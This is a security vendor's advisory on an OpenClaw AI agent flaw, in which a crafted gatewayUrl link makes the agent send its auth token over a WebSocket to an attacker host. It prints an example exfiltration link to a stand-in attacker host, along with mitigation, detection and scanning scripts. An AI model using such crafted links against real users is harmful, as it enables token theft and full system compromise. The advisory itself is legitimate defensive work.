
InSEKurity of the Week (CW06/2026): OpenClaw AI Agent 1-Click RCE (CVE-2026-25253)

Critical vulnerability in OpenClaw AI Agent enables Remote Code Execution with just one click - Authentication token exfiltration through manipulated URLs

SEKurity Team

Offensive Security Experts


This week in our InSEKurity of the Week series: A critical 1-click Remote Code Execution vulnerability in the popular open-source AI agent OpenClaw that can be exploited through auth token exfiltration.

🚨 Summary

  • CVE ID: CVE-2026-25253
  • EUVD ID: EUVD-2026-5280
  • CVSS 3.1 Score: 8.8 (High)
  • CWE: CWE-669 (Incorrect Resource Transfer Between Spheres)
  • Affected Software: OpenClaw (aka Clawdbot, Moltbot) <= v2026.1.24-1
  • Attack Vector: Network (Unauthenticated Remote Attack)
  • Authentication Required: None
  • Impact: Remote Code Execution, Authentication Token Exfiltration
  • Patch Status: ✅ Available (Version v2026.1.29)
  • Published: January 30, 2026
  • Exploit Complexity: Very Low (1-Click)

🤖 What is OpenClaw?

OpenClaw (formerly known as Clawdbot and Moltbot) is a popular open-source AI agent that enables users to automate complex tasks and interact with various APIs and services. As an AI assistant with code execution capabilities, OpenClaw has access to sensitive user data and systems.

The software is used by thousands of developers and companies worldwide for:

  • Workflow automation
  • Cloud service integration
  • API testing and development
  • DevOps tasks
  • Data aggregation and processing

🔍 Technical Analysis

Vulnerability Description

CVE-2026-25253 is an Incorrect Resource Transfer vulnerability that allows attackers to gain complete control over a victim’s system with just a single click on a manipulated link.

The vulnerability is based on a logic flaw in URL parameter processing: OpenClaw accepts a gatewayUrl parameter from the query string and automatically establishes a WebSocket connection to that URL - without user confirmation and without validating the target URL.

Root Cause Analysis

The problem lies in three critical design flaws:

  1. Missing URL Validation: The application doesn’t verify if the gatewayUrl belongs to a trusted domain
  2. Automatic WebSocket Connection: Connection is established immediately without user interaction or warning
  3. Token Transmission: Authentication tokens are automatically transmitted over the WebSocket connection
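A client-side check that closes the first two flaws could look like the following. This is an added example, not OpenClaw's code or its actual patch; the allowlisted host (the page's sample deployment host) and both function names are assumptions.

```javascript
// Added example: hardened handling of a gatewayUrl query parameter.
// ALLOWED_GATEWAYS and the function names are hypothetical.
const ALLOWED_GATEWAYS = new Set(["openclaw-app.example.com"]); // assumed trusted host

// Returns { ok, reason, url } for a raw gatewayUrl value from the query string.
function validateGatewayUrl(raw) {
  let u;
  try {
    u = new URL(raw);
  } catch {
    return { ok: false, reason: "unparseable" };
  }
  // Only TLS-protected WebSockets; rejects ws:, http:, javascript: and others.
  if (u.protocol !== "wss:") return { ok: false, reason: "scheme" };
  // Embedded credentials can disguise the real host (trusted.name@other.host).
  if (u.username || u.password) return { ok: false, reason: "userinfo" };
  // Exact match on the parsed hostname, never a substring or prefix check.
  if (!ALLOWED_GATEWAYS.has(u.hostname)) return { ok: false, reason: "host" };
  return { ok: true, reason: "allowlisted", url: u.href };
}

// Decide what the client connects to for a given page URL. A rejected
// parameter falls back to the configured default, so no connection is opened
// (and no token is sent) to the supplied value.
function resolveGateway(pageUrl, defaultGateway) {
  const raw = new URL(pageUrl).searchParams.get("gatewayUrl");
  if (raw === null) return { connectTo: defaultGateway, rejected: null };
  const verdict = validateGatewayUrl(raw);
  return verdict.ok
    ? { connectTo: verdict.url, rejected: null }
    : { connectTo: defaultGateway, rejected: { raw, reason: verdict.reason } };
}
```

The `rejected` field gives the application something to log, so a blocked override leaves a trace for later triage.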

Attack Vector

A typical 1-click attack proceeds as follows:

# Step 1: Attacker creates a manipulated link
# The link contains an attacker-controlled gatewayUrl

https://openclaw-app.example.com/?gatewayUrl=wss://attacker.evil.com/ws

# Step 2: Victim clicks the link (e.g., in email, chat, social media)
# OpenClaw opens automatically with the manipulated URL

# Step 3: OpenClaw establishes WebSocket connection to attacker
# Without user confirmation or warning

WebSocket Connection: wss://attacker.evil.com/ws
Sending: {"type":"auth","token":"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9..."}

# Step 4: Attacker receives authentication token
# Token enables full access to OpenClaw instance

# Step 5: Attacker executes arbitrary commands
# With the stolen token, the attacker can:
# - Extract API keys
# - Read/write local files
# - Execute code on the system
# - Access cloud services

Concrete Exploitation Scenarios:

  1. Phishing Campaigns: Mass distribution of manipulated links via email
  2. Social Engineering: Sharing links in Slack, Discord, GitHub Issues
  3. Watering Hole: Placing links on compromised websites
  4. Supply Chain: Injecting links into documentation, tutorials
  5. Malvertising: Malicious advertising with OpenClaw links

Impact

After successful token exfiltration, the attacker can:

  • Steal API Keys: Access to AWS, Azure, GitHub, OpenAI, etc.
  • Execute Local Code: RCE on the victim’s system
  • Exfiltrate Data: Project files, credentials, secrets
  • Establish Persistence: Install backdoors
  • Lateral Movement: Penetrate connected systems

⚠️ Impact Assessment

Immediate Impact

  • 1-Click RCE: No user interaction required except clicking the link
  • Token Exfiltration: Complete access to OpenClaw instance
  • No Warning: Victims don’t notice the attack
  • Wide Attack Surface: Any link can be manipulated

Affected Environments

Particularly at risk:

  • Developers: Using OpenClaw for automation
  • DevOps Teams: With access to production systems
  • Cloud Administrators: With privileged API keys
  • Data Scientists: With access to sensitive datasets
  • Enterprises: That have integrated OpenClaw into workflows

Attacker Profiles

The vulnerability is attractive for:

  • Phishing Attackers: For mass credential harvesting
  • APT Groups: For targeted compromise of developers
  • Ransomware Operators: For initial access opportunities
  • Supply Chain Attackers: For compromising build pipelines

🛡️ Mitigation Strategies

Immediate Actions (Priority 1) ⚡

  1. Update to v2026.1.29 or higher:

    # Check version
    openclaw --version
    
    # Update (npm)
    npm update -g openclaw
    
    # Update (from source)
    git pull origin main
    npm install
    npm run build
  2. Rotate all authentication tokens:

    # CRITICAL: After update, change ALL tokens!
    
    # Rotate AWS credentials
    aws iam create-access-key --user-name your-user
    aws iam delete-access-key --access-key-id OLD_KEY_ID
    
    # Rotate GitHub token
    # Via https://github.com/settings/tokens
    
    # Rotate OpenAI API key
    # Via https://platform.openai.com/account/api-keys
    
    # Rotate additional API keys
    # Depending on services used
  3. Check logs for compromise:

    # Search OpenClaw logs
    grep -r "gatewayUrl" ~/.openclaw/logs/
    
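    # WebSocket connections to unknown hosts
    # Extract scheme and host of every ws:// or wss:// URL, then drop the expected gateway host
    grep -rEoh "wss?://[^/\"' ]+" ~/.openclaw/logs/ | grep -vE "://([^/]*\.)?openclaw\.io(:[0-9]+)?$" | sort -u
    
    # Unusual API calls
    grep -r "auth" ~/.openclaw/logs/ | grep -v "openclaw.io"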
  4. Activate network monitoring:

    • Monitor WebSocket connections to external hosts
    • Detect unusual data exfiltration
    • Tighten firewall rules for outbound connections

Detection Measures 🔍

Indicators of Compromise (IoCs):

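# Suspicious WebSocket connections
# lsof lists sockets per process and has no "websocket" label, so filter on the
# process name and compare the peer addresses against the expected gateway
lsof -i -n -P | grep -i openclaw | grep ESTABLISHED

# Search browser history for manipulated links
# History files are SQLite databases: -a reads them as text, -l lists the files that match
grep -al "gatewayUrl=" ~/.config/*/*/History ~/.mozilla/firefox/*/places.sqlite

# Check network traffic for token leaks
# Payloads on port 443 are TLS-encrypted, so this only matches where the traffic
# is available decrypted (for example at a TLS-inspecting proxy)
tcpdump -i any -A -s 0 -l 'tcp port 443' | grep -i --line-buffered "bearer\|token\|api"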

# Check process list for unexpected connections
netstat -antup | grep "openclaw"

SIEM Rules:

  • Alert on WebSocket connections to non-whitelisted domains
  • Monitor token transmissions in network traffic
  • Detect mass link-clicking patterns
  • Log URL parameter manipulation
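The first rule above, together with the log checks from the mitigation steps, can be expressed as a small triage routine. This is an added example and not part of the original article or of OpenClaw; the log format, the sample lines and the allowlist are constructed assumptions (openclaw.io is taken from the grep filters on this page).

```javascript
// Added example: flag log lines that reference WebSocket peers outside an
// allowlist, including percent-encoded gatewayUrl= overrides.
const TRUSTED_HOSTS = new Set(["openclaw.io", "openclaw-app.example.com"]); // assumed

// Trusted if the host equals an allowlisted name or is a subdomain of one.
// A plain substring filter on "openclaw.io" would also hide lookalike hosts.
function isTrusted(host) {
  return [...TRUSTED_HOSTS].some((t) => host === t || host.endsWith("." + t));
}

// Return the untrusted ws:// / wss:// hosts mentioned in one log line.
function untrustedPeers(line) {
  let text = line;
  try { text = decodeURIComponent(line); } catch { /* malformed %: keep raw line */ }
  const hits = [];
  for (const m of text.matchAll(/wss?:\/\/[^\s"'<>&]+/gi)) {
    let host;
    try { host = new URL(m[0]).hostname; } catch { continue; }
    if (!isTrusted(host)) hits.push(host);
  }
  return hits;
}

// Map a list of log lines to [{ lineNo, hosts }] for lines worth reviewing.
function triage(lines) {
  return lines
    .map((line, i) => ({ lineNo: i + 1, hosts: untrustedPeers(line) }))
    .filter((r) => r.hosts.length > 0);
}

// Constructed sample log lines (not real OpenClaw output).
const SAMPLE_LOG = [
  "2026-01-30T09:12:01Z ws connect wss://gateway.openclaw.io/ws",
  "2026-01-30T09:14:47Z open /?gatewayUrl=wss%3A%2F%2Fattacker.evil.com%2Fws",
  "2026-01-30T09:14:48Z ws connect wss://attacker.evil.com/ws",
  "2026-01-30T09:20:10Z ws connect wss://openclaw.io.attacker.evil.com/ws",
  "2026-01-30T09:21:00Z auth ok user=dev1",
];

console.log(triage(SAMPLE_LOG));
```

Any hit dated before the update to v2026.1.29 is a reason to treat the tokens held by that instance as exposed and rotate them.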

Long-term Security Improvements

  1. Least Privilege: Run OpenClaw with minimal permissions
  2. Network Segmentation: Operate AI agents in isolated networks
  3. Token Scoping: API keys with minimal rights and expiration
  4. Security Awareness: Train employees on AI tool phishing
  5. Link Validation: Integrate URL scanners in email gateways

🎯 Why is this Critical?

  1. 1-Click Exploitation: Extremely low attack threshold
  2. AI Agent Security: New attack vectors through AI tools
  3. Token Exfiltration: Access to all connected services
  4. Wide User Base: Thousands of developers and companies affected
  5. Supply Chain Risk: Compromise of build pipelines possible
  6. No User Warning: Attack proceeds completely invisibly
  7. PoC Available: Increases likelihood of active exploitation

📊 Affected Versions and Detection

Vulnerable Versions

  • OpenClaw: All versions <= v2026.1.24-1
  • Clawdbot: All versions (old name)
  • Moltbot: All versions (old name)
  • Safe Version: >= v2026.1.29

Automatic Detection

#!/bin/bash
# Scan script for vulnerable OpenClaw installations

echo "Scanning for vulnerable OpenClaw installations..."

# Check global npm installation
NPM_VERSION=$(npm list -g openclaw 2>/dev/null | grep openclaw@ | sed 's/.*@//;s/ .*//')
if [ -n "$NPM_VERSION" ]; then
    echo "Found global OpenClaw: v$NPM_VERSION"
    if [ "$(printf '%s\n' "2026.1.29" "$NPM_VERSION" | sort -V | head -n1)" != "2026.1.29" ]; then
        echo "⚠️  VULNERABLE: Global OpenClaw v$NPM_VERSION"
    else
        echo "✅ SAFE: Global OpenClaw v$NPM_VERSION"
    fi
fi

# Find local installations
find /home /Users -name "package.json" -type f 2>/dev/null | while IFS= read -r pkg; do
    if grep -q "openclaw" "$pkg"; then
        dir=$(dirname "$pkg")
        version=$(jq -r '.dependencies.openclaw // .devDependencies.openclaw' "$pkg" 2>/dev/null)
        if [ "$version" != "null" ] && [ -n "$version" ]; then
            echo "Found local OpenClaw in $dir: $version"
        fi
    fi
done

🚀 Timeline and Disclosure

  • Discovery Date: January 2026
  • CVE Assignment: CVE-2026-25253
  • Patch Release: January 30, 2026 (v2026.1.29)
  • Public Disclosure: January 30, 2026
  • PoC Publication: January 31, 2026

💼 SEKurity Supports You

This vulnerability demonstrates the new security risks emerging from AI agents and automation tools. A single click can lead to complete compromise.

Our Services

  • Penetration Testing: Web applications, mobile apps (Android & iOS), SAP systems, Active Directory
  • Large-Scale Attacks: Perimeter testing, IT infrastructure testing, Red Team engagements
  • Security Awareness: Phishing campaigns, hacking demonstrations

Act now – before attackers do.


Contact:

🌐 Website: www.sekurity.de

📧 Inquiries: www.sekurity.de/kontakt

📱 LinkedIn: SEKurity GmbH


Your SEKurity Team – Your Trusted Adversaries

Your AI workflow security is our drive.

